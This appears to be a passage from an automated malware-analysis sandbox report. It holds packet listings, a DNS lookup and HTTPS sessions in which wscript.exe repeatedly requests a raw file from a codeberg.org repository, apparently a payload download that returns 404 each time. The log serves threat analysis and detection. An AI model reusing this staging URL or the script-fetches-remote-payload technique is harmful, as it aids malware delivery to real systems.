                    Apr 9, 2024 17:56:28.227740049 CEST44349718217.197.91.145192.168.2.7
                    Apr 9, 2024 17:56:28.227961063 CEST49718443192.168.2.7217.197.91.145
                    Apr 9, 2024 17:56:28.227967978 CEST44349718217.197.91.145192.168.2.7
                    Apr 9, 2024 17:56:28.581146955 CEST44349718217.197.91.145192.168.2.7
                    Apr 9, 2024 17:56:28.581221104 CEST44349718217.197.91.145192.168.2.7
                    Apr 9, 2024 17:56:28.581283092 CEST49718443192.168.2.7217.197.91.145
                    Apr 9, 2024 17:56:28.581321955 CEST49718443192.168.2.7217.197.91.145
                    Apr 9, 2024 17:56:28.581971884 CEST49718443192.168.2.7217.197.91.145
                    Apr 9, 2024 17:56:28.581990957 CEST44349718217.197.91.145192.168.2.7
                    Apr 9, 2024 17:56:30.577267885 CEST49719443192.168.2.7217.197.91.145
                    Apr 9, 2024 17:56:30.577318907 CEST44349719217.197.91.145192.168.2.7
                    Apr 9, 2024 17:56:30.577418089 CEST49719443192.168.2.7217.197.91.145
                    Apr 9, 2024 17:56:30.577725887 CEST49719443192.168.2.7217.197.91.145
                    Apr 9, 2024 17:56:30.577739000 CEST44349719217.197.91.145192.168.2.7
                    Apr 9, 2024 17:56:30.931451082 CEST44349719217.197.91.145192.168.2.7
                    Apr 9, 2024 17:56:30.931659937 CEST49719443192.168.2.7217.197.91.145
                    Apr 9, 2024 17:56:30.932090998 CEST49719443192.168.2.7217.197.91.145
                    Apr 9, 2024 17:56:30.932104111 CEST44349719217.197.91.145192.168.2.7
                    Apr 9, 2024 17:56:30.932326078 CEST49719443192.168.2.7217.197.91.145
                    Apr 9, 2024 17:56:30.932332993 CEST44349719217.197.91.145192.168.2.7
                    Apr 9, 2024 17:56:31.282146931 CEST44349719217.197.91.145192.168.2.7
                    Apr 9, 2024 17:56:31.282239914 CEST44349719217.197.91.145192.168.2.7
                    Apr 9, 2024 17:56:31.282327890 CEST49719443192.168.2.7217.197.91.145
                    Apr 9, 2024 17:56:31.282327890 CEST49719443192.168.2.7217.197.91.145
                    Apr 9, 2024 17:56:31.282890081 CEST49719443192.168.2.7217.197.91.145
                    Apr 9, 2024 17:56:31.282906055 CEST44349719217.197.91.145192.168.2.7
                    Apr 9, 2024 17:56:33.281878948 CEST49720443192.168.2.7217.197.91.145
                    Apr 9, 2024 17:56:33.281925917 CEST44349720217.197.91.145192.168.2.7
                    Apr 9, 2024 17:56:33.282074928 CEST49720443192.168.2.7217.197.91.145
                    Apr 9, 2024 17:56:33.282294035 CEST49720443192.168.2.7217.197.91.145
                    Apr 9, 2024 17:56:33.282303095 CEST44349720217.197.91.145192.168.2.7
                    Apr 9, 2024 17:56:33.635225058 CEST44349720217.197.91.145192.168.2.7
                    Apr 9, 2024 17:56:33.635298967 CEST49720443192.168.2.7217.197.91.145
                    Apr 9, 2024 17:56:33.635827065 CEST49720443192.168.2.7217.197.91.145
                    Apr 9, 2024 17:56:33.635838032 CEST44349720217.197.91.145192.168.2.7
                    Apr 9, 2024 17:56:33.636059999 CEST49720443192.168.2.7217.197.91.145
                    Apr 9, 2024 17:56:33.636065006 CEST44349720217.197.91.145192.168.2.7
                    Apr 9, 2024 17:56:33.991439104 CEST44349720217.197.91.145192.168.2.7
                    Apr 9, 2024 17:56:33.991527081 CEST44349720217.197.91.145192.168.2.7
                    Apr 9, 2024 17:56:33.991604090 CEST49720443192.168.2.7217.197.91.145
                    Apr 9, 2024 17:56:33.991633892 CEST49720443192.168.2.7217.197.91.145
                    Apr 9, 2024 17:56:33.992445946 CEST49720443192.168.2.7217.197.91.145
                    Apr 9, 2024 17:56:33.992471933 CEST44349720217.197.91.145192.168.2.7
                    Apr 9, 2024 17:56:35.998575926 CEST49721443192.168.2.7217.197.91.145
                    Apr 9, 2024 17:56:35.998613119 CEST44349721217.197.91.145192.168.2.7
                    Apr 9, 2024 17:56:35.998692989 CEST49721443192.168.2.7217.197.91.145
                    Apr 9, 2024 17:56:36.006052971 CEST49721443192.168.2.7217.197.91.145
                    Apr 9, 2024 17:56:36.006083012 CEST44349721217.197.91.145192.168.2.7
                    Apr 9, 2024 17:56:36.361064911 CEST44349721217.197.91.145192.168.2.7
                    Apr 9, 2024 17:56:36.361387014 CEST49721443192.168.2.7217.197.91.145
                    Apr 9, 2024 17:56:36.366462946 CEST49721443192.168.2.7217.197.91.145
                    Apr 9, 2024 17:56:36.366472960 CEST44349721217.197.91.145192.168.2.7
                    Apr 9, 2024 17:56:36.366883039 CEST49721443192.168.2.7217.197.91.145
                    Apr 9, 2024 17:56:36.366889000 CEST44349721217.197.91.145192.168.2.7
                    Apr 9, 2024 17:56:36.712047100 CEST44349721217.197.91.145192.168.2.7
                    Apr 9, 2024 17:56:36.712161064 CEST44349721217.197.91.145192.168.2.7
                    Apr 9, 2024 17:56:36.712178946 CEST49721443192.168.2.7217.197.91.145
                    Apr 9, 2024 17:56:36.712213993 CEST49721443192.168.2.7217.197.91.145
                    Apr 9, 2024 17:56:36.712879896 CEST49721443192.168.2.7217.197.91.145
                    Apr 9, 2024 17:56:36.712896109 CEST44349721217.197.91.145192.168.2.7
                    Apr 9, 2024 17:56:38.735739946 CEST49722443192.168.2.7217.197.91.145
                    Apr 9, 2024 17:56:38.735785007 CEST44349722217.197.91.145192.168.2.7
                    Apr 9, 2024 17:56:38.735858917 CEST49722443192.168.2.7217.197.91.145
                    Apr 9, 2024 17:56:38.736094952 CEST49722443192.168.2.7217.197.91.145
                    Apr 9, 2024 17:56:38.736108065 CEST44349722217.197.91.145192.168.2.7
                    Apr 9, 2024 17:56:39.093426943 CEST44349722217.197.91.145192.168.2.7
                    Apr 9, 2024 17:56:39.093566895 CEST49722443192.168.2.7217.197.91.145
                    Apr 9, 2024 17:56:39.094048023 CEST49722443192.168.2.7217.197.91.145
                    Apr 9, 2024 17:56:39.094064951 CEST44349722217.197.91.145192.168.2.7
                    Apr 9, 2024 17:56:39.094315052 CEST49722443192.168.2.7217.197.91.145
                    Apr 9, 2024 17:56:39.094321966 CEST44349722217.197.91.145192.168.2.7
                    Apr 9, 2024 17:56:39.442397118 CEST44349722217.197.91.145192.168.2.7
                    Apr 9, 2024 17:56:39.442486048 CEST44349722217.197.91.145192.168.2.7
                    Apr 9, 2024 17:56:39.442564011 CEST49722443192.168.2.7217.197.91.145
                    Apr 9, 2024 17:56:39.442564964 CEST49722443192.168.2.7217.197.91.145
                    Apr 9, 2024 17:56:40.993180037 CEST49722443192.168.2.7217.197.91.145
                    Apr 9, 2024 17:56:40.993218899 CEST44349722217.197.91.145192.168.2.7
                    Apr 9, 2024 17:56:43.001076937 CEST49723443192.168.2.7217.197.91.145
                    Apr 9, 2024 17:56:43.001123905 CEST44349723217.197.91.145192.168.2.7
                    Apr 9, 2024 17:56:43.001198053 CEST49723443192.168.2.7217.197.91.145
                    Apr 9, 2024 17:56:43.001429081 CEST49723443192.168.2.7217.197.91.145
                    Apr 9, 2024 17:56:43.001446962 CEST44349723217.197.91.145192.168.2.7
                    Apr 9, 2024 17:56:43.359340906 CEST44349723217.197.91.145192.168.2.7
                    Apr 9, 2024 17:56:43.359431982 CEST49723443192.168.2.7217.197.91.145
                    Apr 9, 2024 17:56:43.359905958 CEST49723443192.168.2.7217.197.91.145
                    Apr 9, 2024 17:56:43.359914064 CEST44349723217.197.91.145192.168.2.7
                    Apr 9, 2024 17:56:43.360146999 CEST49723443192.168.2.7217.197.91.145
                    Apr 9, 2024 17:56:43.360152006 CEST44349723217.197.91.145192.168.2.7
                    Apr 9, 2024 17:56:43.708617926 CEST44349723217.197.91.145192.168.2.7
                    Apr 9, 2024 17:56:43.708693027 CEST44349723217.197.91.145192.168.2.7
                    Apr 9, 2024 17:56:43.708741903 CEST49723443192.168.2.7217.197.91.145
                    Apr 9, 2024 17:56:43.708766937 CEST49723443192.168.2.7217.197.91.145
                    Apr 9, 2024 17:56:43.709420919 CEST49723443192.168.2.7217.197.91.145
                    Apr 9, 2024 17:56:43.709434032 CEST44349723217.197.91.145192.168.2.7
                    Apr 9, 2024 17:56:45.710405111 CEST49727443192.168.2.7217.197.91.145
                    Apr 9, 2024 17:56:45.710453033 CEST44349727217.197.91.145192.168.2.7
                    Apr 9, 2024 17:56:45.710540056 CEST49727443192.168.2.7217.197.91.145
                    Apr 9, 2024 17:56:45.710768938 CEST49727443192.168.2.7217.197.91.145
                    Apr 9, 2024 17:56:45.710791111 CEST44349727217.197.91.145192.168.2.7
                    Apr 9, 2024 17:56:46.064682007 CEST44349727217.197.91.145192.168.2.7
                    Apr 9, 2024 17:56:46.064754963 CEST49727443192.168.2.7217.197.91.145
                    Apr 9, 2024 17:56:46.065259933 CEST49727443192.168.2.7217.197.91.145
                    Apr 9, 2024 17:56:46.065314054 CEST44349727217.197.91.145192.168.2.7
                    Apr 9, 2024 17:56:46.065501928 CEST49727443192.168.2.7217.197.91.145
                    Apr 9, 2024 17:56:46.065517902 CEST44349727217.197.91.145192.168.2.7
                    Apr 9, 2024 17:56:46.415153980 CEST44349727217.197.91.145192.168.2.7
                    Apr 9, 2024 17:56:46.415224075 CEST44349727217.197.91.145192.168.2.7
                    Apr 9, 2024 17:56:46.415354013 CEST49727443192.168.2.7217.197.91.145
                    Apr 9, 2024 17:56:46.415354013 CEST49727443192.168.2.7217.197.91.145
                    Apr 9, 2024 17:56:46.415934086 CEST49727443192.168.2.7217.197.91.145
                    Apr 9, 2024 17:56:46.415972948 CEST44349727217.197.91.145192.168.2.7
                    Apr 9, 2024 17:56:48.428977013 CEST49728443192.168.2.7217.197.91.145
                    Apr 9, 2024 17:56:48.429085016 CEST44349728217.197.91.145192.168.2.7
                    Apr 9, 2024 17:56:48.429176092 CEST49728443192.168.2.7217.197.91.145
                    Apr 9, 2024 17:56:48.429404020 CEST49728443192.168.2.7217.197.91.145
                    Apr 9, 2024 17:56:48.429438114 CEST44349728217.197.91.145192.168.2.7
                    Apr 9, 2024 17:56:48.783839941 CEST44349728217.197.91.145192.168.2.7
                    Apr 9, 2024 17:56:48.784020901 CEST49728443192.168.2.7217.197.91.145
                    Apr 9, 2024 17:56:48.785523891 CEST49728443192.168.2.7217.197.91.145
                    Apr 9, 2024 17:56:48.785554886 CEST44349728217.197.91.145192.168.2.7
                    Apr 9, 2024 17:56:48.785845041 CEST49728443192.168.2.7217.197.91.145
                    Apr 9, 2024 17:56:48.785857916 CEST44349728217.197.91.145192.168.2.7
                    Apr 9, 2024 17:56:49.132375956 CEST44349728217.197.91.145192.168.2.7
                    Apr 9, 2024 17:56:49.132473946 CEST44349728217.197.91.145192.168.2.7
                    Apr 9, 2024 17:56:49.132586002 CEST49728443192.168.2.7217.197.91.145
                    Apr 9, 2024 17:56:49.133210897 CEST49728443192.168.2.7217.197.91.145
                    Apr 9, 2024 17:56:49.133255005 CEST44349728217.197.91.145192.168.2.7
                    Apr 9, 2024 17:56:51.122781992 CEST49729443192.168.2.7217.197.91.145
                    Apr 9, 2024 17:56:51.122816086 CEST44349729217.197.91.145192.168.2.7
                    Apr 9, 2024 17:56:51.122879982 CEST49729443192.168.2.7217.197.91.145
                    Apr 9, 2024 17:56:51.123186111 CEST49729443192.168.2.7217.197.91.145
                    Apr 9, 2024 17:56:51.123217106 CEST44349729217.197.91.145192.168.2.7
                    Apr 9, 2024 17:56:51.477035999 CEST44349729217.197.91.145192.168.2.7
                    Apr 9, 2024 17:56:51.477133989 CEST49729443192.168.2.7217.197.91.145
                    Apr 9, 2024 17:56:51.477612972 CEST49729443192.168.2.7217.197.91.145
                    Apr 9, 2024 17:56:51.477618933 CEST44349729217.197.91.145192.168.2.7
                    Apr 9, 2024 17:56:51.477876902 CEST49729443192.168.2.7217.197.91.145
                    Apr 9, 2024 17:56:51.477880955 CEST44349729217.197.91.145192.168.2.7
                    Apr 9, 2024 17:56:51.827431917 CEST44349729217.197.91.145192.168.2.7
                    Apr 9, 2024 17:56:51.827482939 CEST49729443192.168.2.7217.197.91.145
                    Apr 9, 2024 17:56:51.827500105 CEST44349729217.197.91.145192.168.2.7
                    Apr 9, 2024 17:56:51.827512026 CEST44349729217.197.91.145192.168.2.7
                    Apr 9, 2024 17:56:51.827536106 CEST49729443192.168.2.7217.197.91.145
                    Apr 9, 2024 17:56:51.827559948 CEST49729443192.168.2.7217.197.91.145
                    Apr 9, 2024 17:56:51.829658031 CEST49729443192.168.2.7217.197.91.145
                    Apr 9, 2024 17:56:51.829674006 CEST44349729217.197.91.145192.168.2.7
                    Apr 9, 2024 17:56:53.841708899 CEST49730443192.168.2.7217.197.91.145
                    Apr 9, 2024 17:56:53.841736078 CEST44349730217.197.91.145192.168.2.7
                    Apr 9, 2024 17:56:53.841841936 CEST49730443192.168.2.7217.197.91.145
                    Apr 9, 2024 17:56:53.842118025 CEST49730443192.168.2.7217.197.91.145
                    Apr 9, 2024 17:56:53.842130899 CEST44349730217.197.91.145192.168.2.7
                    Apr 9, 2024 17:56:54.195282936 CEST44349730217.197.91.145192.168.2.7
                    Apr 9, 2024 17:56:54.195390940 CEST49730443192.168.2.7217.197.91.145
                    Apr 9, 2024 17:56:54.195806026 CEST49730443192.168.2.7217.197.91.145
                    Apr 9, 2024 17:56:54.195817947 CEST44349730217.197.91.145192.168.2.7
                    Apr 9, 2024 17:56:54.196041107 CEST49730443192.168.2.7217.197.91.145
                    Apr 9, 2024 17:56:54.196047068 CEST44349730217.197.91.145192.168.2.7
                    Apr 9, 2024 17:56:54.544646978 CEST44349730217.197.91.145192.168.2.7
                    Apr 9, 2024 17:56:54.544719934 CEST44349730217.197.91.145192.168.2.7
                    Apr 9, 2024 17:56:54.544768095 CEST49730443192.168.2.7217.197.91.145
                    Apr 9, 2024 17:56:54.544800997 CEST49730443192.168.2.7217.197.91.145
                    Apr 9, 2024 17:56:54.545403004 CEST49730443192.168.2.7217.197.91.145
                    Apr 9, 2024 17:56:54.545423031 CEST44349730217.197.91.145192.168.2.7
                    Apr 9, 2024 17:56:56.692698002 CEST49731443192.168.2.7217.197.91.145
                    Apr 9, 2024 17:56:56.692754030 CEST44349731217.197.91.145192.168.2.7
                    Apr 9, 2024 17:56:56.692830086 CEST49731443192.168.2.7217.197.91.145
                    Apr 9, 2024 17:56:56.693069935 CEST49731443192.168.2.7217.197.91.145
                    Apr 9, 2024 17:56:56.693085909 CEST44349731217.197.91.145192.168.2.7
                    Apr 9, 2024 17:56:57.051198006 CEST44349731217.197.91.145192.168.2.7
                    Apr 9, 2024 17:56:57.052413940 CEST49731443192.168.2.7217.197.91.145
                    Apr 9, 2024 17:56:58.575397015 CEST49731443192.168.2.7217.197.91.145
                    Apr 9, 2024 17:56:58.575431108 CEST44349731217.197.91.145192.168.2.7
                    Apr 9, 2024 17:56:58.575608015 CEST49731443192.168.2.7217.197.91.145
                    Apr 9, 2024 17:56:58.575614929 CEST44349731217.197.91.145192.168.2.7
                    Apr 9, 2024 17:56:58.752230883 CEST44349731217.197.91.145192.168.2.7
                    Apr 9, 2024 17:56:58.752346992 CEST44349731217.197.91.145192.168.2.7
                    Apr 9, 2024 17:56:58.752393007 CEST49731443192.168.2.7217.197.91.145
                    Apr 9, 2024 17:56:58.752423048 CEST49731443192.168.2.7217.197.91.145
                    Apr 9, 2024 17:56:58.752935886 CEST49731443192.168.2.7217.197.91.145
                    Apr 9, 2024 17:56:58.752955914 CEST44349731217.197.91.145192.168.2.7
                    Apr 9, 2024 17:57:00.750849009 CEST49732443192.168.2.7217.197.91.145
                    Apr 9, 2024 17:57:00.750884056 CEST44349732217.197.91.145192.168.2.7
                    Apr 9, 2024 17:57:00.751036882 CEST49732443192.168.2.7217.197.91.145
                    Apr 9, 2024 17:57:00.751691103 CEST49732443192.168.2.7217.197.91.145
                    Apr 9, 2024 17:57:00.751699924 CEST44349732217.197.91.145192.168.2.7
                    Apr 9, 2024 17:57:01.112409115 CEST44349732217.197.91.145192.168.2.7
                    Apr 9, 2024 17:57:01.112624884 CEST49732443192.168.2.7217.197.91.145
                    Apr 9, 2024 17:57:01.113162994 CEST49732443192.168.2.7217.197.91.145
                    Apr 9, 2024 17:57:01.113173962 CEST44349732217.197.91.145192.168.2.7
                    Apr 9, 2024 17:57:01.113411903 CEST49732443192.168.2.7217.197.91.145
                    Apr 9, 2024 17:57:01.113416910 CEST44349732217.197.91.145192.168.2.7
                    Apr 9, 2024 17:57:01.458971024 CEST44349732217.197.91.145192.168.2.7
                    Apr 9, 2024 17:57:01.459033966 CEST49732443192.168.2.7217.197.91.145
                    Apr 9, 2024 17:57:01.459052086 CEST44349732217.197.91.145192.168.2.7
                    Apr 9, 2024 17:57:01.459073067 CEST44349732217.197.91.145192.168.2.7
                    Apr 9, 2024 17:57:01.459090948 CEST49732443192.168.2.7217.197.91.145
                    Apr 9, 2024 17:57:01.459122896 CEST49732443192.168.2.7217.197.91.145
                    Apr 9, 2024 17:57:01.459600925 CEST49732443192.168.2.7217.197.91.145
                    Apr 9, 2024 17:57:01.459615946 CEST44349732217.197.91.145192.168.2.7
                    Apr 9, 2024 17:57:03.452668905 CEST49733443192.168.2.7217.197.91.145
                    Apr 9, 2024 17:57:03.452718019 CEST44349733217.197.91.145192.168.2.7
                    Apr 9, 2024 17:57:03.452858925 CEST49733443192.168.2.7217.197.91.145
                    Apr 9, 2024 17:57:03.453094006 CEST49733443192.168.2.7217.197.91.145
                    Apr 9, 2024 17:57:03.453109026 CEST44349733217.197.91.145192.168.2.7
                    Apr 9, 2024 17:57:03.816967964 CEST44349733217.197.91.145192.168.2.7
                    Apr 9, 2024 17:57:03.817236900 CEST49733443192.168.2.7217.197.91.145
                    Apr 9, 2024 17:57:03.817862988 CEST49733443192.168.2.7217.197.91.145
                    Apr 9, 2024 17:57:03.817871094 CEST44349733217.197.91.145192.168.2.7
                    Apr 9, 2024 17:57:03.818131924 CEST49733443192.168.2.7217.197.91.145
                    Apr 9, 2024 17:57:03.818135977 CEST44349733217.197.91.145192.168.2.7
                    Apr 9, 2024 17:57:04.166593075 CEST44349733217.197.91.145192.168.2.7
                    Apr 9, 2024 17:57:04.166666031 CEST44349733217.197.91.145192.168.2.7
                    Apr 9, 2024 17:57:04.166762114 CEST49733443192.168.2.7217.197.91.145
                    Apr 9, 2024 17:57:04.166845083 CEST49733443192.168.2.7217.197.91.145
                    Apr 9, 2024 17:57:04.167850018 CEST49733443192.168.2.7217.197.91.145
                    Apr 9, 2024 17:57:04.167867899 CEST44349733217.197.91.145192.168.2.7
                    Apr 9, 2024 17:57:06.170511007 CEST49734443192.168.2.7217.197.91.145
                    Apr 9, 2024 17:57:06.170528889 CEST44349734217.197.91.145192.168.2.7
                    Apr 9, 2024 17:57:06.170627117 CEST49734443192.168.2.7217.197.91.145
                    Apr 9, 2024 17:57:06.170954943 CEST49734443192.168.2.7217.197.91.145
                    Apr 9, 2024 17:57:06.170963049 CEST44349734217.197.91.145192.168.2.7
                    Apr 9, 2024 17:57:06.525042057 CEST44349734217.197.91.145192.168.2.7
                    Apr 9, 2024 17:57:06.525192976 CEST49734443192.168.2.7217.197.91.145
                    Apr 9, 2024 17:57:06.525907993 CEST49734443192.168.2.7217.197.91.145
                    Apr 9, 2024 17:57:06.525913000 CEST44349734217.197.91.145192.168.2.7
                    Apr 9, 2024 17:57:06.526174068 CEST49734443192.168.2.7217.197.91.145
                    Apr 9, 2024 17:57:06.526176929 CEST44349734217.197.91.145192.168.2.7
                    Apr 9, 2024 17:57:06.874250889 CEST44349734217.197.91.145192.168.2.7
                    Apr 9, 2024 17:57:06.874325037 CEST44349734217.197.91.145192.168.2.7
                    Apr 9, 2024 17:57:06.874362946 CEST49734443192.168.2.7217.197.91.145
                    Apr 9, 2024 17:57:06.874389887 CEST49734443192.168.2.7217.197.91.145
                    Apr 9, 2024 17:57:06.875058889 CEST49734443192.168.2.7217.197.91.145
                    Apr 9, 2024 17:57:06.875070095 CEST44349734217.197.91.145192.168.2.7
                    Apr 9, 2024 17:57:08.873769999 CEST49735443192.168.2.7217.197.91.145
                    Apr 9, 2024 17:57:08.873806000 CEST44349735217.197.91.145192.168.2.7
                    Apr 9, 2024 17:57:08.873888969 CEST49735443192.168.2.7217.197.91.145
                    Apr 9, 2024 17:57:08.874164104 CEST49735443192.168.2.7217.197.91.145
                    Apr 9, 2024 17:57:08.874174118 CEST44349735217.197.91.145192.168.2.7
                    Apr 9, 2024 17:57:09.227292061 CEST44349735217.197.91.145192.168.2.7
                    Apr 9, 2024 17:57:09.227350950 CEST49735443192.168.2.7217.197.91.145
                    Apr 9, 2024 17:57:09.227834940 CEST49735443192.168.2.7217.197.91.145
                    Apr 9, 2024 17:57:09.227842093 CEST44349735217.197.91.145192.168.2.7
                    Apr 9, 2024 17:57:09.228085041 CEST49735443192.168.2.7217.197.91.145
                    Apr 9, 2024 17:57:09.228087902 CEST44349735217.197.91.145192.168.2.7
                    Apr 9, 2024 17:57:09.592622995 CEST44349735217.197.91.145192.168.2.7
                    Apr 9, 2024 17:57:09.592689991 CEST44349735217.197.91.145192.168.2.7
                    Apr 9, 2024 17:57:09.592739105 CEST49735443192.168.2.7217.197.91.145
                    Apr 9, 2024 17:57:09.592813969 CEST49735443192.168.2.7217.197.91.145
                    Apr 9, 2024 17:57:09.593888998 CEST49735443192.168.2.7217.197.91.145
                    Apr 9, 2024 17:57:09.593902111 CEST44349735217.197.91.145192.168.2.7
                    Apr 9, 2024 17:57:11.592366934 CEST49736443192.168.2.7217.197.91.145
                    Apr 9, 2024 17:57:11.592421055 CEST44349736217.197.91.145192.168.2.7
                    Apr 9, 2024 17:57:11.592516899 CEST49736443192.168.2.7217.197.91.145
                    Apr 9, 2024 17:57:11.592814922 CEST49736443192.168.2.7217.197.91.145
                    Apr 9, 2024 17:57:11.592824936 CEST44349736217.197.91.145192.168.2.7
                    Apr 9, 2024 17:59:14.119182110 CEST44349736217.197.91.145192.168.2.7
                    Apr 9, 2024 17:59:14.121200085 CEST49737443192.168.2.7217.197.91.145
                    Apr 9, 2024 17:59:14.121237040 CEST44349737217.197.91.145192.168.2.7
                    Apr 9, 2024 17:59:14.121382952 CEST49737443192.168.2.7217.197.91.145
                    Apr 9, 2024 17:59:14.121741056 CEST49737443192.168.2.7217.197.91.145
                    Apr 9, 2024 17:59:14.121750116 CEST44349737217.197.91.145192.168.2.7
                    Apr 9, 2024 17:59:17.902646065 CEST44349737217.197.91.145192.168.2.7
                    Apr 9, 2024 17:59:17.903069019 CEST49737443192.168.2.7217.197.91.145
                    Apr 9, 2024 17:59:17.909010887 CEST49737443192.168.2.7217.197.91.145
                    Apr 9, 2024 17:59:17.909025908 CEST44349737217.197.91.145192.168.2.7
                    Apr 9, 2024 17:59:17.910249949 CEST44349737217.197.91.145192.168.2.7
                    Apr 9, 2024 17:59:17.910358906 CEST49737443192.168.2.7217.197.91.145
                    Apr 9, 2024 17:59:17.910726070 CEST49737443192.168.2.7217.197.91.145
                    Apr 9, 2024 17:59:17.956373930 CEST44349737217.197.91.145192.168.2.7

                    UDP Packets

                    TimestampSource PortDest PortSource IPDest IP
                    Apr 9, 2024 17:55:49.951590061 CEST5385253192.168.2.71.1.1.1
                    Apr 9, 2024 17:55:50.040527105 CEST53538521.1.1.1192.168.2.7

                    DNS Queries

                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                    Apr 9, 2024 17:55:49.951590061 CEST192.168.2.71.1.1.10xc5aeStandard query (0)codeberg.orgA (IP address)IN (0x0001)false

                    DNS Answers

                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                    Apr 9, 2024 17:55:50.040527105 CEST1.1.1.1192.168.2.70xc5aeNo error (0)codeberg.org217.197.91.145A (IP address)IN (0x0001)false

                    HTTP Request Dependency Graph

                    • codeberg.org

                    HTTPS Proxied Packets

                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    0192.168.2.749699217.197.91.1454431280C:\Windows\System32\wscript.exe
                    TimestampBytes transferredDirectionData
                    2024-04-09 15:55:50 UTC365OUTGET /yusef.uyo/uyo.salif.code/raw/branch/main/netilify HTTP/1.1
                    Accept: */*
                    Accept-Language: en-ch
                    UA-CPU: AMD64
                    Accept-Encoding: gzip, deflate
                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                    Host: codeberg.org
                    Connection: Keep-Alive
                    2024-04-09 15:55:50 UTC639INHTTP/1.1 404 Not Found
                    cache-control: max-age=0, private, must-revalidate, no-transform
                    content-type: text/plain;charset=utf-8
                    set-cookie: i_like_gitea=9b57cd302e2f8115; Path=/; HttpOnly; Secure; SameSite=Lax; Secure; SameSite=Lax
                    set-cookie: _csrf=HNALZbH0QlYk_CAepQ2pjagAzjQ6MTcxMjY3ODE1MDY5Nzk4MjY1OA; Path=/; Max-Age=86400; HttpOnly; Secure; SameSite=Lax; Secure; SameSite=Lax
                    date: Tue, 09 Apr 2024 15:55:50 GMT
                    content-length: 11
                    strict-transport-security: max-age=63072000; includeSubDomains; preload
                    permissions-policy: interest-cohort=()
                    x-frame-options: sameorigin
                    x-content-type-options: nosniff
                    connection: close
                    2024-04-09 15:55:50 UTC11INData Raw: 4e 6f 74 20 66 6f 75 6e 64 2e 0a
                    Data Ascii: Not found.


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    1192.168.2.749700217.197.91.1454431280C:\Windows\System32\wscript.exe
                    TimestampBytes transferredDirectionData
                    2024-04-09 15:55:53 UTC466OUTGET /yusef.uyo/uyo.salif.code/raw/branch/main/netilify HTTP/1.1
                    Accept: */*
                    Accept-Language: en-ch
                    UA-CPU: AMD64
                    Accept-Encoding: gzip, deflate
                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                    Host: codeberg.org
                    Connection: Keep-Alive
                    Cookie: i_like_gitea=9b57cd302e2f8115; _csrf=HNALZbH0QlYk_CAepQ2pjagAzjQ6MTcxMjY3ODE1MDY5Nzk4MjY1OA
                    2024-04-09 15:55:53 UTC383INHTTP/1.1 404 Not Found
                    cache-control: max-age=0, private, must-revalidate, no-transform
                    content-type: text/plain;charset=utf-8
                    date: Tue, 09 Apr 2024 15:55:53 GMT
                    content-length: 11
                    strict-transport-security: max-age=63072000; includeSubDomains; preload
                    permissions-policy: interest-cohort=()
                    x-frame-options: sameorigin
                    x-content-type-options: nosniff
                    connection: close
                    2024-04-09 15:55:53 UTC11INData Raw: 4e 6f 74 20 66 6f 75 6e 64 2e 0a
                    Data Ascii: Not found.


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    2192.168.2.749701217.197.91.1454431280C:\Windows\System32\wscript.exe
                    TimestampBytes transferredDirectionData
                    2024-04-09 15:55:55 UTC466OUTGET /yusef.uyo/uyo.salif.code/raw/branch/main/netilify HTTP/1.1
                    Accept: */*
                    Accept-Language: en-ch
                    UA-CPU: AMD64
                    Accept-Encoding: gzip, deflate
                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                    Host: codeberg.org
                    Connection: Keep-Alive
                    Cookie: i_like_gitea=9b57cd302e2f8115; _csrf=HNALZbH0QlYk_CAepQ2pjagAzjQ6MTcxMjY3ODE1MDY5Nzk4MjY1OA
                    2024-04-09 15:55:56 UTC383INHTTP/1.1 404 Not Found
                    cache-control: max-age=0, private, must-revalidate, no-transform
                    content-type: text/plain;charset=utf-8
                    date: Tue, 09 Apr 2024 15:55:56 GMT
                    content-length: 11
                    strict-transport-security: max-age=63072000; includeSubDomains; preload
                    permissions-policy: interest-cohort=()
                    x-frame-options: sameorigin
                    x-content-type-options: nosniff
                    connection: close
                    2024-04-09 15:55:56 UTC11INData Raw: 4e 6f 74 20 66 6f 75 6e 64 2e 0a
                    Data Ascii: Not found.


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    3192.168.2.749702217.197.91.1454431280C:\Windows\System32\wscript.exe
                    TimestampBytes transferredDirectionData
                    2024-04-09 15:55:58 UTC466OUTGET /yusef.uyo/uyo.salif.code/raw/branch/main/netilify HTTP/1.1
                    Accept: */*
                    Accept-Language: en-ch
                    UA-CPU: AMD64
                    Accept-Encoding: gzip, deflate
                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                    Host: codeberg.org
                    Connection: Keep-Alive
                    Cookie: i_like_gitea=9b57cd302e2f8115; _csrf=HNALZbH0QlYk_CAepQ2pjagAzjQ6MTcxMjY3ODE1MDY5Nzk4MjY1OA
                    2024-04-09 15:55:58 UTC383INHTTP/1.1 404 Not Found
                    cache-control: max-age=0, private, must-revalidate, no-transform
                    content-type: text/plain;charset=utf-8
                    date: Tue, 09 Apr 2024 15:55:58 GMT
                    content-length: 11
                    strict-transport-security: max-age=63072000; includeSubDomains; preload
                    permissions-policy: interest-cohort=()
                    x-frame-options: sameorigin
                    x-content-type-options: nosniff
                    connection: close
                    2024-04-09 15:55:58 UTC11INData Raw: 4e 6f 74 20 66 6f 75 6e 64 2e 0a
                    Data Ascii: Not found.


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    4192.168.2.749703217.197.91.1454431280C:\Windows\System32\wscript.exe
                    TimestampBytes transferredDirectionData
